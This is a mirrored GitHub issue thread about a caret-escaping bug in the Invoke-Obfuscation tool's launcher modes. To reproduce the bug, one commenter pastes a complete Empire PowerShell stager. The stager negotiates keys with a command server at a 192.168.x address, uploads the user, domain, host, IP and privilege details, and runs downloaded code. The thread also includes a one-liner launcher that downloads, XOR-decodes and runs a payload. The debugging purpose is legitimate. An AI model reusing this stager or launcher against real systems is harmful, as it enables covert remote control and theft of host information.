Several LAUNCHER obfuscation types not working for a particular script in v1.6 about invoke-obfuscation HOT 6 CLOSED

cobbr commented on September 25, 2024

Several LAUNCHER obfuscation types not working for a particular script in v1.6

from invoke-obfuscation.

Comments (6)

cobbr commented on September 25, 2024

Did some more research into this. Looks like it traces back to an issue with String TOKEN obfuscation. Disabling the string TOKEN obfuscation while doing LAUNCHER obfuscation leads to all of the mentioned LAUNCHER obfuscation techniques to work.

If I am able to narrow this down to a more specific issue, I will report back.

from invoke-obfuscation.

danielbohannon commented on September 25, 2024

I have not been able to reproduce this bug. Can you provide me with the encrypted Empire script that is eventually being invoked after the BXOR step?

from invoke-obfuscation.

cobbr commented on September 25, 2024

Here's a fresh example for you.

Here is the pre-encryption Empire stager:

fUNcTion StART-NEGOtiaTe{param($s,$SK,$UA="lol")ADD-Type -asseMBlY SYsteM.SeCUrItY;Add-TyPE -AssEMBlY SYsTEM.CORe;$ErrorActionPreference = "SilentlyContinue";$e=[SySTem.TExt.EncodiNg]::ASCII;$AES=NEw-OBjEcT SYSteM.SECURITY.CryptOGrAphY.AeSCrYPToSERVicEPROVIDer;$IV = [bYte] 0..255 | GET-RANdOM -CoUnT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSp = New-OBjEct SyStEM.SECUrITY.CryPTogRapHY.CspPArAMETeRS;$csP.FLaGS = $Csp.FlAGs -bOR [SyStem.SEcuriTY.CrypTOGrApHy.CspPROViDERFLaGs]::UseMACHineKEyStoRE;$Rs = New-ObjeCt SYstEM.SEcurITy.CrYPTOgrAPHY.RSACRYPtoSerVIcePRoVidER -ARgUMEntList 2048,$CSp;$Rk=$rs.ToXMLStRing($FALSe);$r=1..16|FOrEach-ObJeCt{GeT-RaNdom -MAx 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$r] -JoIn '');$ib=$e.getbytEs($rk);$EB=$IV+$AES.CreATEEnCRyptOr().TRaNSFoRmFinAlBLoCk($ib,0,$ib.LeNGth);IF(-not $WC){$Wc=NEw-objEcT SYsTEM.nET.WEBCLIent;$WC.PRoxY = [SySTem.NET.WebReQUesT]::GeTSyStEmWeBPRoXY();$Wc.PROXy.CrEDENTiaLS = [SyStEm.NET.CrEDENtiAlCAcHE]::DEfAulTCREDeNtIAls;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$de=$e.GEtStRING($RS.DeCrYpT($RaW,$FAlsE));$EpoCh=$de[0..9] -join'';$Key=$de[10..$de.LenGTh] -jOIN '';$AES=New-Object SYSTEm.SEcurITY.CRYptoGRaphy.AESCrYPTOSeRvicePRovIDer;$IV = [BYtE] 0..255 | GeT-RandOM -CoUNt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key); $AES.IV = $IV;$i=$S+'|'+[EnVironmENt]::USERDomaiNNAME+'|'+[EnVIrONMent]::USERNamE+'|'+[ENViroNMent]::MAchineNAmE;$P=(Gwmi WIN32_NeTWoRkADapTeRCoNFIgURatiON|WhERe{$_.IPAdDress}|SELeCt -EXPAND IPADDrEss);$ip = @{$TRUe=$P[0];$fALSE=$P}[$p.LEngth -Lt 6];If(!$Ip -or $ip.trIM() -EQ '') {$iP='0.0.0.0'};$i+="|$ip";$i+='|'+(Get-WMiObjEct WIN32_OPeRaTInGSYSTeM).NAMe.splIT('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'}else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEm.DiaGNOStics.PROceSS]::GeTCuRrENtPROCESS();$i+='|'+$n.PROCeSSNAmE+'|'+$n.Id;$I += '|' + $PSVErsIonTABLe.PSVeRSiON.MAjOR;$iB2=$e.getbyTEs($i);$eb2=$IV+$AES.CrEaTeENCRyPtor().TRAnSFormFiNAlBlOck($iB2,0,$IB2.LEnGTh);$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"index.php","POST",$eb2);$AES=New-Object SySTeM.SEcURity.CrYPTogrAPhy.AEsCrYPtOSERViceProviDer;$AES.Mode="CBC";$IV = $raw[0..15];$AES.Key=$E.GetByTes($keY);$AES.IV = $IV;IEX $([SYSteM.TeXT.EncOdINg]::ASCII.GetStriNg( $($AES.CreaTEDEcRyPTOR().TRaNsfoRMFiNaLBLocK($RaW[16..$RAw.LEnGth],0,$RaW.LENGTH-16))));$AES=$nULL;$S2=$Null;$WC=$NUlL;$eb2=$nulL;$RAw=$nuLl;$IV=$NUlL;$WC=$nuLL;$i=$nulL;$iB2=$nULL;[GC]::COlLect();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -SessionKey $key -SessionID $ID -Epoch $epoch;} Start-Negotiate -s "http://192.168.1.79:8080/" -SK '^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO' -UA $u;

The encrypted Empire stager is attached as a file. (Binary doesn't print well. It's attached as a .txt, because that is what Github supports. Keep in mind it is a binary file. Also keep in mind that this is technically a malicious payload (anyone reading, please don't run!), although it calls back to a 192.168.X, so you are safe.)
encrypted_stager.txt

The python code responsible for encryption:

def xor_encrypt(text,key):
    """
    XOR the given text input with the specified key.
    """
    return "".join(chr(ord(x)^ord(y))for x,y in zip(key*len(text),text))

encrypted = encryption.xor_encrypt(randomizedStager, key)

The randomizedStager is the script shown above. The key (as can be found in the same script) is: ^)tT]PZ8l&H-J\=/f@L(kox!hC?E$nRO

Let me know if I can provide anything else useful for debugging!

from invoke-obfuscation.

cobbr commented on September 25, 2024

The latest commit gives me the following error. This is after performing Launcher\CLIP++\57 :

C:\Windows\system32>CMd /c   " echO\[SySTeM.NEt.SeRvICEPOIntMANAgEr]::ExPeCT100C
ONtINUe = 0;$WC=New-ObjEcT SyStEM.NET.WeBCLiENT;$u='Mozilla/5.0 (Windows NT 6.1;
 WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HEaDerS.Add('User-Agent',$u);$WC.P
Roxy = [SyStEm.Net.WebReqUEsT]::DEfaUlTWeBPROxY;$Wc.PROxy.CrEDeNTials = [SYSTeM.
NEt.CrEdentIALCAche]::DeFAULTNeTWOrkCREDEnTIaLS;$K='^)tT]PZ8l^^^&H-J\=/f@L(kox!h
C?E$nRO';$I=0;[Char[]]$b=([chaR[]]($wC.DowNloadStrIng("http://192.168.1.79:8080/
index.asp")))^^^|%{$_-bXor$K[$i++%$k.LeNgTH]};IEX ($b-JOin'')| c:\winDoWS\SYsTem
32\CLiP&&CMd /cpoWERshELL  -ST -exEcUTIoNP  bYpasS -coMMa     ^^^&( \"{2}{0}{1}\
" -f'yp','e',(\"{0}{1}\" -f 'Add','-T')) -Assembly ( \"{4}{3}{2}{1}{0}{6}{5}\"-f
'in','W','.','em',( \"{0}{1}\" -f'Sy','st' ),'ms',( \"{1}{0}\"-f'r','dows.Fo'))
 ;    ${eXeCuTIoNCoNtEXT}.\"INVo`kEco`m`MA`ND\".\"iN`VOkESCRi`pt\"(( [WindOWs.fO
rMs.cLIPbOaRd]::( \"{2}{1}{0}\" -f'ExT','Ett','G').\"in`V`oke\"(  )  )  )    ;
 [Windows.Forms.Clipboard]::( \"{0}{2}{1}\" -f'Se','xt','tTe'  ).\"iNv`OKE\"( '
' )"
Exception calling "InvokeScript" with "1" argument(s): "At line:2 char:5
+ :j=1&D§?cK+↨Mv-,P♀←‼+Q5BYQ
+     ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:11
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+           ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:4 char:55
+ ♦]∟§♀BGu&o/*→R↑◄.c▬Jt747F♠uHF4l hVAlU♫►O☻_>Uh¶►Lq^(▬
+                                                       ~
Missing closing ')' in expression.
At line:5 char:10
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣    r☺+z9JK+f    u    ⌂]K5rZ‼.}♫@"→ ...
+          ~
Unexpected token ')' in expression or statement.
At line:5 char:17
+ N↓cbtV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣    r☺+z9JK+f    u    ⌂]K5rZ‼.}♫@"→ ...
+                 ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:5 char:56
+ ... tV`k§)J▲v¶↨►&GiYyy!gL☺9k?Sqo⌂♣    r☺+z9JK+f    u    ⌂]K5rZ‼.}♫@"→M☺u  ...
+                                                                 ~
Unexpected token '}' in expression or statement.
At line:6 char:2
+ G&4`Vl-xk5vz♫]+`v6M|z#↓ RO<↨]$f♣u1%<L:I♀W@↔g]h"x_9"+☼☻=<kBR;☻‼;wJ ...
+  ~
The ampersand (&) character is not allowed. The & operator is reserved for
future use; wrap an ampersand in double quotation marks ("&") to pass it as
part of a string.
At line:9 char:49
+ j(6Fc^Y:♥'F1[G&YB9(▲S☻z98"c▬Wtxn↑lR.2,E1xxg↕:];H#l x868"B
+                                                 ~
Missing closing ')' in expression.
At line:10 char:90
+ ... 9NDNqz1◄e8L!b={VfH%?S"<Q<<♠ha|S#^ hdN◄Mb*]wJJa↨27⌂rG→¶M2J‼ <n‼+RLv2: ...
+                                                                 ~
The '<' operator is reserved for future use.
At line:11 char:2
+ 2{W↔R;$h7Op9§D☼)U~♀*↓tnS1 w8s_VYYK{&4|&'t(.O$u,=x▬3 TifY
+  ~
Unexpected token '{' in expression or statement.
Not all parse errors were reported.  Correct the reported errors and try
again."
At line:1 char:168
+ ... ows.Fo')) ; ${eXeCuTIoNCoNtEXT}."INVo`kEco`m`MA`ND"."iN`VOkESCRi`pt"( ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CmdletInvocationException

from invoke-obfuscation.

shellster commented on September 25, 2024

The issue, which I have also experienced (at least one of the issues), is that Invoke-Obfuscation is not properly escaping caret (^) symbols in your powershell. You need to go through your powershell and any place you have a caret symbol, add two. so "[^s]" should become "[^^s]".

from invoke-obfuscation.

danielbohannon commented on September 25, 2024

shellster, you are 100% correct. I was so focused on properly adding ^ for escaped characters that I missed that non-escape ^ characters were being removed. Thanks so much for this find. This issue should be resolved (in all affected launchers) in commit 3619e16

Please add any comments if you still encounter this issue in your use cases. Thanks again to both of you! Sorry this one took so long to track down.

from invoke-obfuscation.

Several LAUNCHER obfuscation types not working for a particular script in v1.6 about invoke-obfuscation HOT 6 CLOSED

Comments (6)

Related Issues (20)

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent